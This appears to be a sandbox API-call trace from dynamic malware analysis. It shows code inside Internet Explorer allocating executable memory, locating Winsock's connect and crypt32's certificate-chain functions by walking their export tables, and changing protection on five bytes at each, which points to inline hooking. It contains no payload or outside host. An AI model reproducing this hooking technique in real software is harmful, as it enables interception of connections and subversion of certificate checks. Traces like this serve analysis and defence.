	[0191.196] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xf) returned 0x2efe298
	[0191.196] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x16) returned 0x2f023f8
	[0191.196] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x2a) returned 0x2f343c8
	[0191.196] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x29) returned 0x2f34198
	[0191.196] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x14) returned 0x2f02418
	[0191.196] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x16) returned 0x2f02438
	[0191.196] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x22) returned 0x2f1b3b8
	[0191.196] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x12) returned 0x2f02458
	[0191.196] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x18) returned 0x2f02478
	[0191.196] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x46) returned 0x2ef6890
	[0191.196] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f026e0 | out: hHeap=0x2b0000) returned 1
	[0191.196] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1a216fd, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x551fb00 | out: lpThreadId=0x551fb00*=0x1cc) returned 0x1cc
	[0191.197] CloseHandle (hObject=0x1cc) returned 1
	[0191.197] RtlExitUserThread (Status=0x1) 
	[0191.197] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x329c80 | out: hHeap=0x2b0000) returned 1

Thread:
	id = 190
	os_tid = 0x1cc

	[0191.198] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1a21479, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x594fda0 | out: lpThreadId=0x594fda0*=0xba8) returned 0x1cc
	[0191.198] GetExitCodeThread (in: hThread=0x1cc, lpExitCode=0x594fda4 | out: lpExitCode=0x594fda4) returned 1
	[0191.198] WaitForSingleObject (hHandle=0x1cc, dwMilliseconds=0xffffffff) returned 0x0

Thread:
	id = 191
	os_tid = 0xba8

	[0191.199] VirtualAlloc (lpAddress=0x0, dwSize=0x1aa, flAllocationType=0x3000, flProtect=0x40) returned 0x1a40000
	[0191.199] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x5a5fcfc, nSize=0x104 | out: lpFilename="C:\\Program Files\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files\\internet explorer\\iexplore.exe")) returned 0x2f
	[0191.199] PathFindFileNameA (pszPath="C:\\Program Files\\Internet Explorer\\iexplore.exe") returned="iexplore.exe"
	[0191.199] lstrcmpiA (lpString1="iexplore.exe", lpString2="microsoftedgecp.exe") returned -1
	[0191.199] lstrcmpiA (lpString1="iexplore.exe", lpString2="iexplore.exe") returned 0
	[0191.199] GetModuleHandleA (lpModuleName="Ws2_32.dll") returned 0x75a90000
	[0191.200] GetProcAddress (hModule=0x75a90000, lpProcName="connect") returned 0x75a96bdd
	[0191.200] LoadLibraryA (lpLibFileName="Ws2_32.dll") returned 0x75a90000
	[0191.200] lstrcmpA (lpString1="FreeAddrInfoEx", lpString2="connect") returned 1
	[0191.200] lstrcmpA (lpString1="FreeAddrInfoExW", lpString2="connect") returned 1
	[0191.200] lstrcmpA (lpString1="FreeAddrInfoW", lpString2="connect") returned 1
	[0191.200] lstrcmpA (lpString1="GetAddrInfoExA", lpString2="connect") returned 1
	[0191.200] lstrcmpA (lpString1="GetAddrInfoExW", lpString2="connect") returned 1
	[0191.200] lstrcmpA (lpString1="GetAddrInfoW", lpString2="connect") returned 1
	[0191.200] lstrcmpA (lpString1="GetNameInfoW", lpString2="connect") returned 1
	[0191.200] lstrcmpA (lpString1="InetNtopW", lpString2="connect") returned 1
	[0191.200] lstrcmpA (lpString1="InetPtonW", lpString2="connect") returned 1
	[0191.200] lstrcmpA (lpString1="SetAddrInfoExA", lpString2="connect") returned 1
	[0191.200] lstrcmpA (lpString1="SetAddrInfoExW", lpString2="connect") returned 1
	[0191.200] lstrcmpA (lpString1="WEP", lpString2="connect") returned 1
	[0191.200] lstrcmpA (lpString1="WPUCompleteOverlappedRequest", lpString2="connect") returned 1
	[0191.200] lstrcmpA (lpString1="WSAAccept", lpString2="connect") returned 1
	[0191.200] lstrcmpA (lpString1="WSAAddressToStringA", lpString2="connect") returned 1
	[0191.200] lstrcmpA (lpString1="WSAAddressToStringW", lpString2="connect") returned 1
	[0191.200] lstrcmpA (lpString1="WSAAdvertiseProvider", lpString2="connect") returned 1
	[0191.200] lstrcmpA (lpString1="WSAAsyncGetHostByAddr", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSAAsyncGetHostByName", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSAAsyncGetProtoByName", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSAAsyncGetProtoByNumber", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSAAsyncGetServByName", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSAAsyncGetServByPort", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSAAsyncSelect", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSACancelAsyncRequest", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSACancelBlockingCall", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSACleanup", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSACloseEvent", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSAConnect", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSAConnectByList", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSAConnectByNameA", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSAConnectByNameW", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSACreateEvent", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSADuplicateSocketA", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSADuplicateSocketW", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSAEnumNameSpaceProvidersA", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSAEnumNameSpaceProvidersExA", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSAEnumNameSpaceProvidersExW", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSAEnumNameSpaceProvidersW", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSAEnumNetworkEvents", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSAEnumProtocolsA", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSAEnumProtocolsW", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSAEventSelect", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSAGetLastError", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSAGetOverlappedResult", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSAGetQOSByName", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSAGetServiceClassInfoA", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSAGetServiceClassInfoW", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSAGetServiceClassNameByClassIdA", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSAGetServiceClassNameByClassIdW", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSAHtonl", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSAHtons", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSAInstallServiceClassA", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSAInstallServiceClassW", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSAIoctl", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSAIsBlocking", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSAJoinLeaf", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSALookupServiceBeginA", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSALookupServiceBeginW", lpString2="connect") returned 1
	[0191.201] lstrcmpA (lpString1="WSALookupServiceEnd", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSALookupServiceNextA", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSALookupServiceNextW", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSANSPIoctl", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSANtohl", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSANtohs", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSAPoll", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSAProviderCompleteAsyncCall", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSAProviderConfigChange", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSARecv", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSARecvDisconnect", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSARecvFrom", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSARemoveServiceClass", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSAResetEvent", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSASend", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSASendDisconnect", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSASendMsg", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSASendTo", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSASetBlockingHook", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSASetEvent", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSASetLastError", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSASetServiceA", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSASetServiceW", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSASocketA", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSASocketW", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSAStartup", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSAStringToAddressA", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSAStringToAddressW", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSAUnadvertiseProvider", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSAUnhookBlockingHook", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSAWaitForMultipleEvents", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSApSetPostRoutine", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSCDeinstallProvider", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSCEnableNSProvider", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSCEnumProtocols", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSCGetApplicationCategory", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSCGetProviderInfo", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSCGetProviderPath", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSCInstallNameSpace", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSCInstallNameSpaceEx", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSCInstallProvider", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSCInstallProviderAndChains", lpString2="connect") returned 1
	[0191.202] lstrcmpA (lpString1="WSCSetApplicationCategory", lpString2="connect") returned 1
	[0191.203] lstrcmpA (lpString1="WSCSetProviderInfo", lpString2="connect") returned 1
	[0191.203] lstrcmpA (lpString1="WSCUnInstallNameSpace", lpString2="connect") returned 1
	[0191.203] lstrcmpA (lpString1="WSCUpdateProvider", lpString2="connect") returned 1
	[0191.203] lstrcmpA (lpString1="WSCWriteNameSpaceOrder", lpString2="connect") returned 1
	[0191.203] lstrcmpA (lpString1="WSCWriteProviderOrder", lpString2="connect") returned 1
	[0191.203] lstrcmpA (lpString1="WahCloseApcHelper", lpString2="connect") returned 1
	[0191.203] lstrcmpA (lpString1="WahCloseHandleHelper", lpString2="connect") returned 1
	[0191.203] lstrcmpA (lpString1="WahCloseNotificationHandleHelper", lpString2="connect") returned 1
	[0191.203] lstrcmpA (lpString1="WahCloseSocketHandle", lpString2="connect") returned 1
	[0191.203] lstrcmpA (lpString1="WahCloseThread", lpString2="connect") returned 1
	[0191.203] lstrcmpA (lpString1="WahCompleteRequest", lpString2="connect") returned 1
	[0191.203] lstrcmpA (lpString1="WahCreateHandleContextTable", lpString2="connect") returned 1
	[0191.203] lstrcmpA (lpString1="WahCreateNotificationHandle", lpString2="connect") returned 1
	[0191.203] lstrcmpA (lpString1="WahCreateSocketHandle", lpString2="connect") returned 1
	[0191.203] lstrcmpA (lpString1="WahDestroyHandleContextTable", lpString2="connect") returned 1
	[0191.203] lstrcmpA (lpString1="WahDisableNonIFSHandleSupport", lpString2="connect") returned 1
	[0191.203] lstrcmpA (lpString1="WahEnableNonIFSHandleSupport", lpString2="connect") returned 1
	[0191.203] lstrcmpA (lpString1="WahEnumerateHandleContexts", lpString2="connect") returned 1
	[0191.203] lstrcmpA (lpString1="WahInsertHandleContext", lpString2="connect") returned 1
	[0191.203] lstrcmpA (lpString1="WahNotifyAllProcesses", lpString2="connect") returned 1
	[0191.203] lstrcmpA (lpString1="WahOpenApcHelper", lpString2="connect") returned 1
	[0191.203] lstrcmpA (lpString1="WahOpenCurrentThread", lpString2="connect") returned 1
	[0191.203] lstrcmpA (lpString1="WahOpenHandleHelper", lpString2="connect") returned 1
	[0191.203] lstrcmpA (lpString1="WahOpenNotificationHandleHelper", lpString2="connect") returned 1
	[0191.203] lstrcmpA (lpString1="WahQueueUserApc", lpString2="connect") returned 1
	[0191.203] lstrcmpA (lpString1="WahReferenceContextByHandle", lpString2="connect") returned 1
	[0191.203] lstrcmpA (lpString1="WahRemoveHandleContext", lpString2="connect") returned 1
	[0191.203] lstrcmpA (lpString1="WahWaitForNotification", lpString2="connect") returned 1
	[0191.203] lstrcmpA (lpString1="WahWriteLSPEvent", lpString2="connect") returned 1
	[0191.203] lstrcmpA (lpString1="__WSAFDIsSet", lpString2="connect") returned -1
	[0191.203] lstrcmpA (lpString1="accept", lpString2="connect") returned -1
	[0191.203] lstrcmpA (lpString1="bind", lpString2="connect") returned -1
	[0191.203] lstrcmpA (lpString1="closesocket", lpString2="connect") returned -1
	[0191.203] lstrcmpA (lpString1="connect", lpString2="connect") returned 0
	[0191.203] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x75a96bdd, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x5a5fca8 | out: lpflOldProtect=0x5a5fca8*=0x20) returned 1
	[0191.205] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x75a96bdd, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x5a5fca8 | out: lpflOldProtect=0x5a5fca8*=0x40) returned 1
	[0191.206] GetModuleHandleA (lpModuleName="crypt32.dll") returned 0x75610000
	[0191.206] GetProcAddress (hModule=0x75610000, lpProcName="CertGetCertificateChain") returned 0x75626ccf
	[0191.206] LoadLibraryA (lpLibFileName="crypt32.dll") returned 0x75610000
	[0191.207] lstrcmpA (lpString1="CertAddCRLContextToStore", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertCloseStore", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertComparePublicKeyInfo", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertControlStore", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertCreateCRLContext", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertCreateCTLContext", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertCreateCTLEntryFromCertificateContextProperties", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertCreateCertificateChainEngine", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertCreateCertificateContext", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertCreateContext", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertCreateSelfSignCertificate", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertDeleteCRLFromStore", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertDeleteCTLFromStore", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertDeleteCertificateFromStore", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertDuplicateCRLContext", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertDuplicateCTLContext", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertDuplicateCertificateChain", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertDuplicateCertificateContext", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertDuplicateStore", lpString2="CertGetCertificateChain") returned -1
	[0191.207] lstrcmpA (lpString1="CertEnumCRLContextProperties", lpString2="CertGetCertificateChain") returned -1
	[0191.208] lstrcmpA (lpString1="CertEnumCRLsInStore", lpString2="CertGetCertificateChain") returned -1
	[0191.208] lstrcmpA (lpString1="CertEnumCTLContextProperties", lpString2="CertGetCertificateChain") returned -1
	[0191.208] lstrcmpA (lpString1="CertEnumCTLsInStore", lpString2="CertGetCertificateChain") returned -1
	[0191.208] lstrcmpA (lpString1="CertEnumCertificateContextProperties", lpString2="CertGetCertificateChain") returned -1
	[0191.208] lstrcmpA (lpString1="CertEnumCertificatesInStore", lpString2="CertGetCertificateChain") returned -1
	[0191.208] lstrcmpA (lpString1="CertEnumPhysicalStore", lpString2="CertGetCertificateChain") returned -1
	[0191.208] lstrcmpA (lpString1="CertEnumSubjectInSortedCTL", lpString2="CertGetCertificateChain") returned -1
	[0191.208] lstrcmpA (lpString1="CertEnumSystemStore", lpString2="CertGetCertificateChain") returned -1
	[0191.208] lstrcmpA (lpString1="CertEnumSystemStoreLocation", lpString2="CertGetCertificateChain") returned -1
	[0191.208] lstrcmpA (lpString1="CertFindAttribute", lpString2="CertGetCertificateChain") returned -1
	[0191.208] lstrcmpA (lpString1="CertFindCRLInStore", lpString2="CertGetCertificateChain") returned -1
	[0191.208] lstrcmpA (lpString1="CertFindCTLInStore", lpString2="CertGetCertificateChain") returned -1
	[0191.208] lstrcmpA (lpString1="CertFindCertificateInCRL", lpString2="CertGetCertificateChain") returned -1
	[0191.208] lstrcmpA (lpString1="CertFindCertificateInStore", lpString2="CertGetCertificateChain") returned -1
	[0191.208] lstrcmpA (lpString1="CertFindChainInStore", lpString2="CertGetCertificateChain") returned -1
	[0191.208] lstrcmpA (lpString1="CertFindExtension", lpString2="CertGetCertificateChain") returned -1
	[0191.208] lstrcmpA (lpString1="CertFindRDNAttr", lpString2="CertGetCertificateChain") returned -1
	[0191.208] lstrcmpA (lpString1="CertFindSubjectInCTL", lpString2="CertGetCertificateChain") returned -1
	[0191.208] lstrcmpA (lpString1="CertFindSubjectInSortedCTL", lpString2="CertGetCertificateChain") returned -1
	[0191.208] lstrcmpA (lpString1="CertFreeCRLContext", lpString2="CertGetCertificateChain") returned -1
	[0191.208] lstrcmpA (lpString1="CertFreeCTLContext", lpString2="CertGetCertificateChain") returned -1
	[0191.208] lstrcmpA (lpString1="CertFreeCertificateChain", lpString2="CertGetCertificateChain") returned -1
	[0191.208] lstrcmpA (lpString1="CertFreeCertificateChainEngine", lpString2="CertGetCertificateChain") returned -1
	[0191.208] lstrcmpA (lpString1="CertFreeCertificateChainList", lpString2="CertGetCertificateChain") returned -1
	[0191.208] lstrcmpA (lpString1="CertFreeCertificateContext", lpString2="CertGetCertificateChain") returned -1
	[0191.208] lstrcmpA (lpString1="CertFreeServerOcspResponseContext", lpString2="CertGetCertificateChain") returned -1
	[0191.208] lstrcmpA (lpString1="CertGetCRLContextProperty", lpString2="CertGetCertificateChain") returned 1
	[0191.208] lstrcmpA (lpString1="CertGetCRLFromStore", lpString2="CertGetCertificateChain") returned 1
	[0191.208] lstrcmpA (lpString1="CertGetCTLContextProperty", lpString2="CertGetCertificateChain") returned 1
	[0191.208] lstrcmpA (lpString1="CertGetCertificateChain", lpString2="CertGetCertificateChain") returned 0
	[0191.208] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x75626ccf, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x5a5fca8 | out: lpflOldProtect=0x5a5fca8*=0x20) returned 1
	[0191.211] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x75626ccf, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x5a5fca8 | out: lpflOldProtect=0x5a5fca8*=0x40) returned 1
	[0191.212] GetProcAddress (hModule=0x75610000, lpProcName="CertVerifyCertificateChainPolicy") returned 0x7562cae2
	[0191.212] LoadLibraryA (lpLibFileName="crypt32.dll") returned 0x75610000
	[0191.212] lstrcmpA (lpString1="CertAddCRLContextToStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.212] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.212] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.212] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.212] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.212] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.212] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.212] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.212] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.212] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.212] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.212] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.212] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.212] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.212] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.212] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.212] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.213] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.213] lstrcmpA (lpString1="CertCloseStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.213] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.213] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.213] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.213] lstrcmpA (lpString1="CertComparePublicKeyInfo", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.213] lstrcmpA (lpString1="CertControlStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.213] lstrcmpA (lpString1="CertCreateCRLContext", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.213] lstrcmpA (lpString1="CertCreateCTLContext", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.213] lstrcmpA (lpString1="CertCreateCTLEntryFromCertificateContextProperties", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.213] lstrcmpA (lpString1="CertCreateCertificateChainEngine", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.213] lstrcmpA (lpString1="CertCreateCertificateContext", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.213] lstrcmpA (lpString1="CertCreateContext", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.213] lstrcmpA (lpString1="CertCreateSelfSignCertificate", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.213] lstrcmpA (lpString1="CertDeleteCRLFromStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.213] lstrcmpA (lpString1="CertDeleteCTLFromStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.213] lstrcmpA (lpString1="CertDeleteCertificateFromStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.213] lstrcmpA (lpString1="CertDuplicateCRLContext", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.213] lstrcmpA (lpString1="CertDuplicateCTLContext", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.213] lstrcmpA (lpString1="CertDuplicateCertificateChain", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.213] lstrcmpA (lpString1="CertDuplicateCertificateContext", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.213] lstrcmpA (lpString1="CertDuplicateStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.213] lstrcmpA (lpString1="CertEnumCRLContextProperties", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.213] lstrcmpA (lpString1="CertEnumCRLsInStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.213] lstrcmpA (lpString1="CertEnumCTLContextProperties", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.213] lstrcmpA (lpString1="CertEnumCTLsInStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0191.214] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7562cae2, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x5a5fca8 | out: lpflOldProtect=0x5a5fca8*=0x20) returned 1
